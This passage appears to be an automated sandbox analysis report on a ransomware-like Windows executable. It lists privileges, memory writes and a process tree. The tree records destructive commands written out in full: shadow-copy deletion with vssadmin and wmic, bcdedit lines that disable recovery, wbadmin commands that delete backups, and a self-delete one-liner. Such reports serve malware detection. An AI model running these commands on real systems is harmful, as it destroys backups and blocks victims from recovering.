Token: SeIncreaseQuotaPrivilege	5080	WMIC.exe
Token: SeSecurityPrivilege	5080	WMIC.exe
Token: SeTakeOwnershipPrivilege	5080	WMIC.exe
Token: SeLoadDriverPrivilege	5080	WMIC.exe
Token: SeSystemProfilePrivilege	5080	WMIC.exe
Token: SeSystemtimePrivilege	5080	WMIC.exe
Token: SeProfSingleProcessPrivilege	5080	WMIC.exe
Token: SeIncBasePriorityPrivilege	5080	WMIC.exe
Token: SeCreatePagefilePrivilege	5080	WMIC.exe
Token: SeBackupPrivilege	5080	WMIC.exe
Token: SeRestorePrivilege	5080	WMIC.exe
Token: SeShutdownPrivilege	5080	WMIC.exe
Token: SeDebugPrivilege	5080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5080	WMIC.exe
Token: SeRemoteShutdownPrivilege	5080	WMIC.exe
Token: SeUndockPrivilege	5080	WMIC.exe
Token: SeManageVolumePrivilege	5080	WMIC.exe
Token: 33	5080	WMIC.exe
Token: 34	5080	WMIC.exe
Token: 35	5080	WMIC.exe
Token: 36	5080	WMIC.exe
Token: SeBackupPrivilege	4892	wbengine.exe
Token: SeRestorePrivilege	4892	wbengine.exe
Token: SeSecurityPrivilege	4892	wbengine.exe
Token: SeIncreaseQuotaPrivilege	4856	wmic.exe
Token: SeSecurityPrivilege	4856	wmic.exe
Token: SeTakeOwnershipPrivilege	4856	wmic.exe
Token: SeLoadDriverPrivilege	4856	wmic.exe
Token: SeSystemProfilePrivilege	4856	wmic.exe
Token: SeSystemtimePrivilege	4856	wmic.exe
Token: SeProfSingleProcessPrivilege	4856	wmic.exe
Token: SeIncBasePriorityPrivilege	4856	wmic.exe
Token: SeCreatePagefilePrivilege	4856	wmic.exe
Token: SeBackupPrivilege	4856	wmic.exe
Token: SeRestorePrivilege	4856	wmic.exe
Token: SeShutdownPrivilege	4856	wmic.exe
Token: SeDebugPrivilege	4856	wmic.exe
Token: SeSystemEnvironmentPrivilege	4856	wmic.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.execmd.execmd.exe

description	pid	process	target process
PID 524 wrote to memory of 3000	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	cmd.exe
PID 524 wrote to memory of 3000	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	cmd.exe
PID 3000 wrote to memory of 5040	3000	cmd.exe	vssadmin.exe
PID 3000 wrote to memory of 5040	3000	cmd.exe	vssadmin.exe
PID 3000 wrote to memory of 5080	3000	cmd.exe	WMIC.exe
PID 3000 wrote to memory of 5080	3000	cmd.exe	WMIC.exe
PID 524 wrote to memory of 3556	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 3556	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 2336	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 2336	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 3000 wrote to memory of 4908	3000	cmd.exe	bcdedit.exe
PID 3000 wrote to memory of 4908	3000	cmd.exe	bcdedit.exe
PID 3000 wrote to memory of 3968	3000	cmd.exe	bcdedit.exe
PID 3000 wrote to memory of 3968	3000	cmd.exe	bcdedit.exe
PID 524 wrote to memory of 616	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 616	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 4260	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 4260	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 3000 wrote to memory of 272	3000	cmd.exe	wbadmin.exe
PID 3000 wrote to memory of 272	3000	cmd.exe	wbadmin.exe
PID 524 wrote to memory of 1416	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 1416	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 4856	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 4856	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 4136	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 4136	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 5080	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 5080	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 4044	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 4044	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 4856	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 4856	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 1512	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 1512	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 1736	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 1736	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 280	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 280	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	vssadmin.exe
PID 524 wrote to memory of 4136	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 4136	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 3904	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 3904	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	bcdedit.exe
PID 524 wrote to memory of 3960	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 3960	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 3504	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 3504	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wbadmin.exe
PID 524 wrote to memory of 976	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 976	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	wmic.exe
PID 524 wrote to memory of 4080	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	cmd.exe
PID 524 wrote to memory of 4080	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	cmd.exe
PID 524 wrote to memory of 4080	524	b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe	cmd.exe
PID 4080 wrote to memory of 4644	4080	cmd.exe	PING.EXE
PID 4080 wrote to memory of 4644	4080	cmd.exe	PING.EXE
PID 4080 wrote to memory of 4644	4080	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe
"C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe"
1⤵
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4908
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3968
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:272
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:3556
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2336
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:616
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  - Drops file in Windows directory
  PID:4260
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  PID:1416
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4856
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4136
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5080
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4044
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  PID:4856
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  PID:1512
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:1736
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:280
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4136
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3904
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Deletes System State backups
  PID:3960
- C:\Windows\SYSTEM32\wbadmin.exe
  wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Deletes System State backups
  PID:3504
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  PID:976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 20
    3⤵
    - Runs ping.exe
    PID:4644